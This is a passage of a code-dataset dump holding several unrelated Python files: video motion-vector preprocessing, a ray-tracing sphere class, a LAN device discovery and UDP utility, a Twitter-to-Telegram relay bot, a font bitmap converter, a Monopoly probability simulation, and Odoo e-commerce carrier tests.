mvs_y = motion_vectors[:, 6]\n x = (mvs_x - 8) // 16\n y = (mvs_y - 8) // 16\n motion_vectors_grid[0, y, x] = motion_vectors[:, 7] / motion_vectors[:, 9] # x component\n motion_vectors_grid[1, y, x] = motion_vectors[:, 8] / motion_vectors[:, 9] # y component\n return motion_vectors_grid\n\n\nif __name__ == \"__main__\":\n\n sequences = {\n \"train\": [\n \"MOT17-02\",\n \"MOT17-04\",\n #\"MOT17-05\",\n \"MOT17-11\",\n \"MOT17-13\",\n ],\n \"val\": [\n \"MOT17-09\",\n \"MOT17-10\",\n ],\n \"test\": [\n \"MOT17-01\",\n \"MOT17-03\",\n \"MOT17-06\",\n \"MOT17-07\",\n \"MOT17-08\",\n \"MOT17-12\",\n \"MOT17-14\",\n ]\n }\n\n frame_shapes = {\n \"train\": [(1920, 1080), # MOT17-02\n (1920, 1080), # MOT17-04\n #(640, 480), # MOT17-05\n (1920, 1080), # MOT17-11\n (1920, 1080)], # MOT17-13\n \"val\": [(1920, 1080), # MOT17-09\n (1920, 1080)], # MOT17-10\n \"test\": [(1920, 1080), # MOT17-01\n (1920, 1080), # MOT17-03\n #(640, 480), # MOT17-06\n (1920, 1080), # MOT17-07\n (1920, 1080), # MOT17-08\n (1920, 1080), # MOT17-12\n (1920, 1080)] # MOT17-14\n }\n\n lengths = {\n \"train\": [600, # MOT17-02\n 1050, # MOT17-04\n #837, # MOT17-05\n 900, # MOT17-11\n 750], # MOT17-13\n \"val\": [525, # MOT17-09\n 654], # MOT17-10\n \"test\": [450, # MOT17-01\n 1500, # MOT17-03\n #1194, # MOT17-06\n 500, # MOT17-07\n 625, # MOT17-08\n 900, # MOT17-12\n 750] # MOT17-14\n }\n\n codec = \"mpeg4\" # whether to use h264 or mpeg4 video sequences\n\n for mode in [\"train\", \"val\", \"test\"]:\n\n data = []\n\n for sequence, frame_shape in zip(sequences[mode], frame_shapes[mode]):\n\n if mode == \"val\":\n dirname = os.path.join(\"train\", \"{}-FRCNN\".format(sequence))\n else:\n dirname = os.path.join(mode, \"{}-FRCNN\".format(sequence))\n\n if codec == \"h264\":\n video_file = os.path.join(\"sequences\", \"h264\", \"{}.mp4\".format(sequence))\n elif codec == \"mpeg4\":\n video_file = os.path.join(\"sequences\", \"mpeg4\", \"{}.avi\".format(sequence))\n\n num_frames = len(glob.glob(os.path.join(dirname, 'img1/*.jpg')))\n detections = load_detections(os.path.join(dirname, 'det/det.txt'), num_frames)\n if mode == \"train\" or mode == \"val\":\n gt_ids, gt_boxes, _ = load_groundtruth(os.path.join(dirname, 'gt/gt.txt'), only_eval=True)\n\n print(\"Extracting motion vectors for sequence {}\".format(sequence))\n\n cap = VideoCap()\n ret = cap.open(video_file)\n if not ret:\n raise RuntimeError(\"Could not open the video file\")\n\n pbar = tqdm(total=num_frames)\n for frame_idx in range(0, num_frames):\n ret, frame, motion_vectors, frame_type, _ = cap.read()\n if not ret:\n break\n\n pbar.update()\n\n data_item = {\n \"frame_idx\": frame_idx,\n \"sequence\": sequence,\n \"frame_type\": frame_type,\n \"det_boxes\": detections[frame_idx]\n }\n\n # bounding boxes\n if mode == \"train\" or mode == \"val\":\n data_item[\"gt_boxes\"] = gt_boxes[frame_idx]\n data_item[\"gt_ids\"] = gt_ids[frame_idx]\n else:\n data_item[\"gt_boxes\"] = []\n data_item[\"gt_ids\"] = []\n\n\n # motion vectors (interpolated on regular 16x16 grid)\n if frame_type != \"I\":\n motion_vectors = normalize_vectors(motion_vectors)\n if codec == \"h264\":\n mvs_x_interp, mvs_y_interp = interp_motion_vectors(motion_vectors, frame_shape)\n mvs = torch.from_numpy(np.dstack((mvs_x_interp, mvs_y_interp)))\n mvs = mvs.permute(2, 0, 1).float() # store as C, H, W\n elif codec == \"mpeg4\":\n mvs = motion_vectors_to_grid(motion_vectors)\n mvs = torch.from_numpy(mvs).float()\n data_item[\"motion_vectors\"] = mvs\n else:\n data_item[\"motion_vectors\"] = torch.zeros([2, 68, 120], dtype=torch.float)\n\n data.append(data_item)\n\n cap.release()\n pbar.close()\n\n pickle.dump(data, open(os.path.join(\"preprocessed\", codec, mode, \"data.pkl\"), 'wb'))\n pickle.dump(lengths[mode], open(os.path.join(\"preprocessed\", codec, mode, \"lengths.pkl\"), 'wb'))\n","sub_path":"old/benchmark/MOT17/compute_motion_vectors (copy).py","file_name":"compute_motion_vectors (copy).py","file_ext":"py","file_size_in_byte":8801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"507138097","text":"import numpy as np\nfrom typing import List, Tuple, Union\nimport math\n\nimport App.properties.trace_properties\nfrom surfaces.surface import Surface\nfrom surfaces.additional.general_methods import keep_positive_number\n\n\nclass Sphere(Surface):\n \"\"\"\n (r-p0,r-p0) = R^2 - canonical equation of sphere\n :argument center - сооrdinate of sphere center\n :argument radius - radius of sphere\n :argument type_surface - reflecting or refracting surface\n :argument n1,n2 - refractive indexes of space. watch method get_refractive_indexes in class Surface\n \"\"\"\n\n def __init__(self, center: list, radius: float,\n type_surface: Surface.types = Surface.types.REFLECTING,\n n1: float = 1,\n n2: float = 1):\n if n1 < 1 or n2 < 1:\n raise AttributeError(\"Refractive indices less than unity. n1: {}, n2: {}\".format(n1, n2))\n if not all(isinstance(i, float) or isinstance(i, int) for i in center):\n raise AttributeError(\"\"\"Some element in %s is not a float number.\"\"\" % (str(center)))\n\n Surface.__init__(self, type_of_surface=type_surface, dimension=len(center))\n self.__center = center.copy()\n self.__r = radius\n self._Surface__n1 = n1\n self._Surface__n2 = n2\n\n # =========================== getter and setter ====================================================================\n\n @property\n def center(self):\n return self.__center\n\n @property\n def r(self):\n return self.__r\n\n # ============================== Sphere object methods =============================================================\n\n def __str__(self):\n return \"Sphere:{ center: %s, radius: %s, type: %s}\" % (str(self.center), str(self.r), str(self.type))\n\n # def draw_surface(self, axes, color='b', alpha=0.5) -> bool:\n # if self.dim == 2:\n #\n # elif self.dim == 3:\n # u = np.linspace(0, 2 * np.pi, 100)\n # v = np.linspace(0, np.pi, 100)\n #\n # x = np.subtract(self.r * np.outer(np.cos(u), np.sin(v)), -self.center[0])\n # y = np.subtract(self.r * np.outer(np.sin(u), np.sin(v)), -self.center[1])\n # z = np.subtract(self.r * np.outer(np.ones(np.size(u)), np.cos(v)), -self.center[2])\n # print('x = ')\n # print(x)\n # print('y = ')\n # print(y)\n #\n # axes.plot_surface(x, y, z, rstride=4, cstride=4, color=color, alpha=alpha)\n # return True\n #\n # raise AttributeError(\"Defined only dor dimension 2 and 3\")\n\n def is_point_belong(self, point: (list, tuple)) -> bool:\n if len(point) != self.dim:\n raise AttributeError(\"The point %s have different dimension than sphere(%s)\" % (str(point), str(self.dim)))\n\n r0 = np.subtract(point, self.center)\n if abs(np.linalg.norm(r0) - self.r) < 10 * np.finfo(float).eps:\n return True\n\n def norm_vec(self, point):\n # if not self.is_point_belong(point):\n # raise AttributeError(\"The point %s is not belong surface %s\" % (str(point), str(self)))\n\n n = []\n for i in range(self.dim):\n n.append(2 * (point[i] - self.center[i]))\n\n return np.dot(1 / np.linalg.norm(n), n)\n\n def get_refractive_indexes(self, point: list):\n \"\"\"\n returns 2 coefficients\n :param point:\n :return: n1,n2\n \"\"\"\n \"\"\"\n n1 - outside of sphere\n n2 - on sphere and inside sphere\"\"\"\n rad_vec = np.subtract(point, self.center)\n if np.linalg.norm(rad_vec) - self.r > 10 * np.finfo(float).eps:\n return self._Surface__n1, self._Surface__n2\n return self._Surface__n2, self._Surface__n1\n\n # ======================================= methods for Ray ==========================================================\n def ray_surface_intersection(self, e: list, r: list) -> List[Union[float, int]]:\n r0_p0 = np.subtract(self.center, r)\n r0_p0e = np.dot(r0_p0, e)\n # ищем дискриминант\n disc = r0_p0e ** 2 - np.dot(r0_p0, r0_p0) + self.r ** 2\n if (abs(disc) < np.finfo(float).eps):\n disc = 0\n\n if disc < 0:\n return []\n # ищем корни/корень\n t = None\n if (disc != 0):\n sqrt_disc = math.sqrt(disc)\n t = [r0_p0e - sqrt_disc, r0_p0e + sqrt_disc]\n else:\n t = [r0_p0e]\n return keep_positive_number(t, eps=App.properties.trace_properties.MINIMAL_END_LENGTH_OF_RAY)\n\n # ======================================== methods for Ray_pool ====================================================\n # methods \"find_intersection_pool_with_surface\" and \"find_nearest_intersection_pool_with_surface\"\n # is realized in class Surface\n","sub_path":"surfaces/analitic/sphere.py","file_name":"sphere.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"384505704","text":"import binascii\nfrom nmap import PortScanner\nimport socket\nfrom PyQt4.QtCore import SIGNAL, QThread\n\n\nclass StatParser(dict):\n\n def __init__(self):\n super(StatParser, self).__init__()\n\n def parse(self, code):\n if len(code) != 36:\n raise\n self['type'] = code[2]\n self['serial'] = ''.join(str(i) for i in code[3:5])\n self['version'] = code[5]\n self['mac'] = '-'.join(str(i) for i in code[6:12])\n self['gateway'] = '.'.join(str(i) for i in code[12:16])\n self['mask'] = '.'.join(str(i) for i in code[16:20])\n self['ip'] = '.'.join(str(i) for i in code[20:24])\n self['port'] = ''.join(str(i) for i in code[24:26])\n self['config'] = code[26:-2]\n self['code'] = ''.join(str(i) for i in code[-2:])\n\n\nclass ServerScanner(PortScanner):\n\n def __init__(self):\n super(ServerScanner, self).__init__()\n\n def discover(self):\n host_ip = socket.gethostbyname(socket.getfqdn())\n # 假定ip为C类,子网掩码为255.255.255.0\n subnet = host_ip + '/24'\n self.scan(hosts=subnet, arguments='-n -sn -PE -PA21,23,80,3389,5000')\n yield from [x for x in self.all_hosts()\n if self[x]['status']['state'] == 'up' if x != host_ip]\n\n\nclass UDPClient(QThread):\n\n def __init__(self):\n super(UDPClient, self).__init__()\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n self.sock.setblocking(False)\n self.running = False\n self.receiving = False\n\n def bind(self, addr):\n self.sock.bind(addr)\n\n def sendto(self, msg, addr):\n msg = msg.encode()\n self.sock.sendto(msg, addr)\n\n def run(self):\n self.running = True\n self.receiving = True\n self.emit(SIGNAL('showInfo(QString)'), 'UDP started')\n while self.receiving:\n try:\n data, addr = self.sock.recvfrom(5120)\n self.emit(SIGNAL('showInfo(QString)'), data.decode())\n except socket.error:\n pass\n else:\n self.emit(SIGNAL('showInfo(QString)'), 'UDP stopped')\n\n def stop(self):\n self.receiving = False\n\n def close(self):\n self.running = False\n self.receiving = False\n self.emit(SIGNAL('showInfo(QString)'), 'UDP closed')\n self.sock.close()\n\n\nif __name__ == '__main__':\n client = UDPClient()\n # client.set_bind(('', 6000))\n client.sendto('hello', ('192.168.1.102', 5000))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"102210300","text":"import twitter\nfrom time import sleep\nimport telegram\nimport html\nfrom app import config\nimport re\nfrom pprint import pprint\nfrom datetime import datetime\n\nprint('Starting')\n\n\ndef process_tweet(tweet, account):\n print(account + str(tweet['id']) + ' - ' + tweet['created_at'])\n\n if 'retweet_count' not in tweet and len(tweet['user_mentions']) == 0:\n if 'media' in tweet:\n regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\n get = re.compile(regex, re.IGNORECASE | re.DOTALL)\n text = get.sub('', tweet['full_text'])\n message = tweet['media'][0]['media_url'] + '\\n\\n' + text\n else:\n message = tweet['full_text']\n\n if 'quoted_status' in tweet:\n regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\n get = re.compile(regex, re.IGNORECASE | re.DOTALL)\n message = get.sub('', message)\n message = message + '\\n\\n' + '```' + tweet['quoted_status']['full_text'] + '```'\n\n twitter_text = account + html.unescape(message)\n\n if account == 'OLLY - ':\n send_olly_message(twitter_text)\n else:\n send_message(twitter_text)\n\n\ndef send_message(message):\n sleep(1)\n bot = telegram.Bot(token=config.TELEGRAM_BOT_API_KEY)\n\n # LR Jack's Tips\n try:\n bot.send_message(chat_id='-1001190331415', text=message,\n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception as e:\n # print('failed to parse markdown, sent as html')\n # pprint(message)\n bot.send_message(chat_id='-1001190331415', text=message,\n parse_mode=telegram.ParseMode.HTML)\n print(e)\n\ndef send_olly_message(message):\n sleep(1)\n bot = telegram.Bot(token=config.TELEGRAM_BOT_API_KEY)\n\n # LR Jack's Tips\n try:\n # Spanners Playground\n bot.send_message(chat_id='-1001456379435', text=message,\n parse_mode=telegram.ParseMode.MARKDOWN)\n except Exception as e:\n # print('failed to parse markdown, sent as html')\n # pprint(message)\n bot.send_message(chat_id='-1001190331415', text=message,\n parse_mode=telegram.ParseMode.HTML)\n print(e)\n\n\napi = twitter.Api(consumer_key=config.API_KEY,\n consumer_secret=config.API_SECRET,\n access_token_key=config.ACCESS_TOKEN,\n access_token_secret=config.ACCESS_TOKEN_SECRET,\n cache=None,\n tweet_mode='extended')\n\n# try:\nwhile True:\n try:\n # pt = api.GetUserTimeline(screen_name=\"@TopRacingTipsRP\", count=200)\n tt = api.GetUserTimeline(screen_name=\"@spannerjago\", count=1)\n pt = api.GetUserTimeline(screen_name=\"@TRTPremium\", count=20)\n gt = api.GetUserTimeline(screen_name=\"@TRTGold\", count=20)\n ro = api.GetUserTimeline(screen_name=\"@Raceolly\", count=20)\n\n p_tweets = [i.AsDict() for i in pt]\n g_tweets = [i.AsDict() for i in gt]\n t_tweets = [i.AsDict() for i in tt]\n r_tweets = [i.AsDict() for i in ro]\n\n for p_tweet in reversed(p_tweets):\n with open('p_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if p_tweet['id'] > last_id:\n process_tweet(p_tweet, 'PREMIUM - ')\n\n with open('p_ids.txt', 'w') as f:\n f.write(str(p_tweet['id']))\n\n for g_tweet in reversed(g_tweets):\n with open('g_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if g_tweet['id'] > last_id:\n g_results_list = process_tweet(g_tweet, 'GOLD - ')\n\n with open('g_ids.txt', 'w') as f:\n f.write(str(g_tweet['id']))\n\n for r_tweet in reversed(r_tweets):\n # print(r_tweet)\n with open('r_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if r_tweet['id'] > last_id:\n r_results_list = process_tweet(r_tweet, 'OLLY - ')\n\n with open('r_ids.txt', 'w') as f:\n f.write(str(r_tweet['id']))\n\n for t_tweet in reversed(t_tweets):\n with open('t_ids.txt', 'r') as f:\n last_id = int(f.read())\n\n if 'media' in t_tweet:\n get = re.compile('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',re.IGNORECASE|re.DOTALL)\n text = get.sub('', t_tweet['full_text'])\n tweet = t_tweet['media'][0]['media_url'] + '\\n\\n' + text\n else:\n tweet = t_tweet['full_text']\n\n if t_tweet['id'] > last_id:\n print('TEST - ' + str(t_tweet['id']) + ' - ' + t_tweet['created_at'])\n token = config.TELEGRAM_BOT_API_KEY\n bot = telegram.Bot(token=token)\n # Spanners Playground\n bot.send_message(chat_id='-1001456379435',\n text=tweet,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n with open('t_ids.txt', 'w') as f:\n f.write(str(t_tweet['id']))\n\n # print('Sleeping at ' + strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n sleep(10)\n except KeyboardInterrupt:\n print('Keyboard interrupt')\n break\n except Exception as e:\n sleep(2)\n print('General Exception', flush=True)\n print(str(e))\n continue\n","sub_path":"trt.py","file_name":"trt.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105486278","text":"#b üssü n i yazdırıyoruz\nimport time\n\n#recursivle yazdım\ndef power(b, n):\n if n==0:\n return 1\n else:\n return b*power(b, n-1)\n\n#iteratif yazdım\ndef power_iteratif(b, n):\n p=1\n for i in range(0, n):\n p=p*b\n\n return p\n\nstart=time.time()\n\nend_start=time.time()\nprint(end_start-start)\n\nx=power_iteratif(2,10)\ny=power(2, 10)\n\nprint(x)\nprint(y)\n\n","sub_path":"MY_EXERCISE/uslu_recursive.py","file_name":"uslu_recursive.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640466201","text":"#!/usr/bin/env python3\n\n# png2pf\n# Convert PNG image to MiSTer UI font (1bpp bitmap),\n# and optionally a nicely formatted preview image.\n#\n# Program by David Lindecrantz \n# Distributed under the terms of the MIT license\n\nimport argparse\nimport functools\nimport os\nimport sys\nimport png\n\ndef is_file(parser, arg):\n if not os.path.isfile(arg): parser.error(\"file %s does not exist\" % arg)\n else: return arg\n\ndef chunks(seq, size):\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n\n# read png as 2D bitmap array (bool[][])\ndef read_png_1bpp(path):\n (_, _, data, _) = png.Reader(file=open(path, \"rb\")).asRGBA8()\n bitmap = []\n for line in data:\n l = []\n for rgba in chunks(line, 4):\n l.append((rgba[3] > 127) and (0.2989 * rgba[0] + 0.5870 * rgba[1] + 0.1140 * rgba[2]) > 127)\n bitmap.append(l)\n return bitmap\n\n# slice 2D array into dim*dim sized tiles\ndef make_tiles(pixels, dim=8, num_chars=None):\n if len(pixels) % dim != 0:\n raise Exception(\"image height not a multiple of {}\".format(dim))\n if len(pixels[0]) % dim != 0:\n raise Exception(\"image width not a multiple of {}\".format(dim))\n tiles = []\n for y in range(0, len(pixels), dim):\n for x in range(0, len(pixels[0]), dim):\n tiles.append([pixels[y+yl][x:x+dim] for yl in range(dim)])\n if num_chars and len(tiles) >= num_chars:\n return tiles\n return tiles\n\n# write preview png\ndef write_preview(bitmap, path, dim=8, num_chars=None):\n scale = 4\n width = scale * (1 + len(bitmap[0]) + len(bitmap[0]) // dim)\n height = scale * (1 + len(bitmap) + len(bitmap) // dim)\n tiles = make_tiles(bitmap, dim)\n pixels = [bytearray(width) for i in range(height)]\n try:\n chars = 0\n for ypos in range(scale, height, scale * (dim + 1)):\n for xpos in range(scale, width, scale * (dim + 1)):\n blit_bitmap(tiles.pop(0), pixels, xpos, ypos, scale)\n chars += 1\n if num_chars and chars >= num_chars: raise StopIteration\n except StopIteration:\n pass\n with open(path, \"wb\") as file:\n writer = png.Writer(size=(width,height), greyscale=True, compression=9)\n writer.write(file, pixels)\n\n# blit bitmap (int/bool[][]) to pixel array (bytearray[][])\ndef blit_bitmap(src_bitmap, dest_pixels, xpos, ypos, scale=1):\n for srcy, row in enumerate(src_bitmap):\n for srcx, pixel in enumerate(row):\n val = int(pixel) if not isinstance(pixel, bool) else (255 if pixel else 0)\n dx = xpos + srcx * scale\n dy = ypos + srcy * scale\n for dx,dy in [(x,y) for x in range(dx, dx + scale) for y in range(dy, dy + scale)]:\n dest_pixels[dy][dx] = val\n\ndef main():\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--in-png\", dest=\"in_png\", metavar=\"FILE\", required=True, type=lambda x: is_file(parser, x), help=\"input png\")\n parser.add_argument(\"-o\", \"--out-pf\", dest=\"out_pf\", metavar=\"FILE\", help=\"output bitmap\")\n parser.add_argument(\"-p\", \"--out-preview\", dest=\"out_preview\", metavar=\"FILE\", help=\"output preview image\")\n parser.add_argument(\"-n\", \"--num-chars\", dest=\"num_chars\", type=int, help=\"limit number of characters to process\")\n args = parser.parse_args()\n\n bitmap = read_png_1bpp(args.in_png)\n\n if args.out_pf:\n pf = bytearray()\n for tile in make_tiles(bitmap, num_chars=args.num_chars):\n for line in tile:\n pf.append(functools.reduce(lambda a,b: (a << 1) + b, line))\n with open(args.out_pf, \"wb\") as file:\n file.write(pf)\n\n if args.out_preview:\n write_preview(bitmap, args.out_preview, num_chars=args.num_chars)\n\n return 0\n\n except Exception as err:\n print(\"error - {}\".format(err))\n sys.exit(1)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"tools/png2pf.py","file_name":"png2pf.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"199668345","text":"# import lists from other files\nfrom streets import streetsList\nfrom streets import street_colors\nfrom chanceCards import chanceCardList\nfrom comChestCards import comChestCardList\nimport random\nimport PySimpleGUI as Sg\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\nfrom tqdm import tqdm\n\nstyle.use(\"ggplot\")\n\n# Creating input layout\nlayout = [\n [Sg.Text(\"How many throws do you want to make?\")],\n [Sg.Input(1000)],\n [Sg.Checkbox(\"Show Moves\"), Sg.Checkbox(\"Show Progress\"), Sg.Checkbox(\"Show Streets Only\")],\n [Sg.Checkbox(\"Jail\", default=True), Sg.Checkbox(\"Triple Dice Jail\", default=True),\n Sg.Checkbox(\"Community Chest Cards\", default=True), Sg.Checkbox(\"Chance Cards\", default=True)],\n [Sg.Text(\"(Showing Progress will make the calculation slower)\")],\n [Sg.Submit(\"Run\"), Sg.CloseButton(\"Exit\")]\n]\n\n# Showing input window\nwindow = Sg.Window(\"Monopoly Probability\").Layout(layout)\nbutton, values = window.Read()\n\nif button == \"Exit\":\n exit()\n\n# Defining user inputs\nruns = int(values[0])\nshowMoves = values[1]\nshowProgress = values[2]\nshowOnlyStreets = values[3]\njail = values[4]\ntripleJail = values[5]\ncomChestCards = values[6]\nchanceCards = values[7]\n\n# creating copies of chance- and comChestLists\ncopyChanceCardList = list(chanceCardList)\ncopyComChestCardList = list(comChestCardList)\n\n# creating the Result list and the ProbabilityList\nresultList = []\nprobList = []\nstreet_occur_list = []\n\n# defining original values for different variables\nnewPosIndex = 0\nthrows = 0\nchanceCardsDrawn = 0\ncomChestCardsDrawn = 0\nprogress = 0\nfirstThrow = 0\n\n# start loop\nfor _ in tqdm(range(runs)):\n same1 = False\n same2 = False\n # throw dice\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n throw = dice1 + dice2\n throws += 1\n\n # Two of same dice\n if tripleJail:\n if dice1 == dice2 and same2:\n newPosIndex = 10\n if dice1 == dice2 and same1:\n same2 = True\n if dice1 == dice2:\n same1 = True\n\n # general movement\n posIndex = newPosIndex\n pos = streetsList[posIndex]\n if not same2:\n newPosIndex = posIndex + throw\n if same2:\n newPosIndex = 10\n if newPosIndex > 39:\n diff = newPosIndex - 40\n newPosIndex = 0 + diff\n\n # move when chance card draw\n if chanceCards:\n if newPosIndex == 7 or newPosIndex == 22 or newPosIndex == 36:\n cardDraw = random.randint(0, (len(chanceCardList)-1))\n if cardDraw == 0:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 0\n if cardDraw == 1:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 21\n if cardDraw == 2:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 11\n if cardDraw == 3:\n if newPosIndex == 7 or newPosIndex == 36:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 12\n if newPosIndex == 22:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 28\n if cardDraw == 4 or cardDraw == 5:\n if newPosIndex == 7:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 15\n if newPosIndex == 22:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 25\n if newPosIndex == 36:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 5\n if cardDraw == 6:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex -= 3\n if cardDraw == 7:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 10\n chanceCardList.pop(cardDraw)\n chanceCardsDrawn += 1\n if chanceCardsDrawn == 16:\n chanceCardList = list(copyChanceCardList)\n chanceCardsDrawn = 0\n\n # move when com chest cards draw\n if comChestCards:\n if newPosIndex == 2 or newPosIndex == 17 or newPosIndex == 33:\n cardDraw = random.randint(0, (len(comChestCardList) - 1))\n if cardDraw == 0:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 0\n if cardDraw == 1:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 10\n comChestCardList.pop(cardDraw)\n comChestCardsDrawn += 1\n if comChestCardsDrawn == 16:\n comChestCardList = list(copyComChestCardList)\n comChestCardsDrawn = 0\n\n # find landing spot and add to result list\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n\n # move - land on prison\n if jail:\n if newPosIndex == 30:\n newPosIndex = 10\n # show end position\n\n # create Probability list\n for x in streetsList:\n streetOccur = resultList.count(x)\n street_occur_list.append(str(streetOccur))\n streetProb = \"%.2f\" % float(float(streetOccur / throws) * 100)\n probList.append(streetProb)\n\n results_bar = sorted(zip(probList, streetsList, street_colors, street_occur_list))\n\n\n common_streets = [topic[1] for topic in results_bar]\n y_pos = np.arange(len(common_streets))\n street_prob_1 = [topic[0] for topic in results_bar]\n street_prob = []\n for x in street_prob_1:\n street_prob.append(float(x))\n bar_color = [topic[2] for topic in results_bar]\n street_occur_1 = [topic[3] for topic in results_bar]\n street_occur = []\n for x in street_occur_1:\n street_occur.append(int(x))\n\n plt.figure(figsize=(12, 7))\n plt.bar(y_pos, street_prob, align=\"center\", alpha=1, color=bar_color)\n\n plt.xticks(y_pos, common_streets, rotation=\"vertical\")\n plt.ylabel(\"Probability %\")\n\n for i in range(len(y_pos)):\n plt.text(x=y_pos[i]-0.1, y=street_prob[i] + 0.1, s=street_occur[i], size=6, rotation=\"vertical\")\n\n plt.title(f\"Monopoly Streets Probability \\n {throws} throws\")\n plt.savefig(f\"graph_video/images/{throws}.png\")\n plt.close()\n\n probList = []\n street_occur = []\n street_prob = []\n street_occur_list = []\n\n\n","sub_path":"main_image.py","file_name":"main_image.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570566253","text":"# -*- coding: utf-8 -*-\n# Copyright 2017 Akretion (http://www.akretion.com).\n# @author Sébastien BEAU \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom odoo.addons.shopinvader.tests.test_cart import CommonConnectedCartCase\n\n\nclass CarrierCase(CommonConnectedCartCase):\n\n def setUp(self):\n super(CarrierCase, self).setUp()\n self.free_carrier = self.env.ref('delivery.free_delivery_carrier')\n self.poste_carrier = self.env.ref('delivery.delivery_carrier')\n\n def _set_carrier(self, carrier):\n response = self.service.dispatch('add_carrier', params={\n 'carrier': {'id': carrier.id},\n })\n self.assertEqual(self.cart.carrier_id.id, carrier.id)\n return response['data']\n\n def test_available_carriers(self):\n response = self.service.dispatch('search')\n self.assertIn('available_carriers', response['data']['shipping'])\n shipping = response['data']['shipping']\n self.assertEqual(shipping['available_carriers']['count'], 2)\n\n def test_setting_free_carrier(self):\n cart = self._set_carrier(self.free_carrier)\n self.assertEqual(cart['shipping']['amount']['total'], 0)\n\n def test_setting_poste_carrier(self):\n cart = self._set_carrier(self.poste_carrier)\n # Check shipping amount\n self.assertEqual(cart['shipping']['amount']['total'], 20)\n self.assertEqual(cart['shipping']['amount']['untaxed'], 17.39)\n self.assertEqual(cart['shipping']['amount']['tax'], 2.61)\n\n # Check items amount\n self.assertEqual(cart['lines']['amount']['total'], 8555.0)\n self.assertEqual(cart['lines']['amount']['untaxed'], 8555.0)\n self.assertEqual(cart['lines']['amount']['tax'], 0)\n\n # Check total amount\n self.assertEqual(cart['amount']['total'], 8575.0)\n self.assertEqual(cart['amount']['untaxed'], 8572.39)\n self.assertEqual(cart['amount']['tax'], 2.61)\n\n def test_should_only_return_matching_carrier(self):\n # change country to make first carrier method not available\n self.free_carrier.write({\n 'country_ids': [(6, 0, self.env.ref('base.us').ids)],\n })\n response = self.service.dispatch('update', params={\n 'step': {'current': 'cart_address'},\n })\n # shipping information should be available now\n shipping = response['data']['shipping']\n self.assertEqual(shipping['available_carriers']['count'], 1)\n\n def test_update_cart_update_price(self):\n self.env.ref('product.product_product_24').weight = 4\n cart = self._set_carrier(self.poste_carrier)\n self.assertEqual(cart['shipping']['amount']['total'], 50)\n self.assertEqual(cart['shipping']['amount']['untaxed'], 43.48)\n self.assertEqual(cart['shipping']['amount']['tax'], 6.52)\n\n response = self.service.dispatch('update_item', params={\n 'item_id': self.env.ref('shopinvader.sale_order_line_4').id,\n 'item_qty': 1,\n })\n shipping = response['data']['shipping']\n self.assertEqual(shipping['amount']['total'], 20)\n self.assertEqual(shipping['amount']['untaxed'], 17.39)\n self.assertEqual(shipping['amount']['tax'], 2.61)\n\n def test_setting_address_set_default_carrier(self):\n response = self.service.dispatch('update', params={\n 'shipping': {'address': {'id': self.address.id}},\n })\n shipping = response['data']['shipping']\n self.assertEqual(\n shipping['selected_carrier']['id'], self.free_carrier.id)\n\n def test_changing_with_compatible_address_keep_carrier(self):\n self._set_carrier(self.poste_carrier)\n response = self.service.dispatch('update', params={\n 'shipping': {'address': {'id': self.address.id}},\n })\n shipping = response['data']['shipping']\n self.assertEqual(\n shipping['selected_carrier']['id'], self.poste_carrier.id)\n\n def test_changing_with_incompatible_address_change_carrier(self):\n self.free_carrier.write({\n 'country_ids': [(6, 0, self.env.ref('base.fr').ids)],\n })\n response = self.service.dispatch('update', params={\n 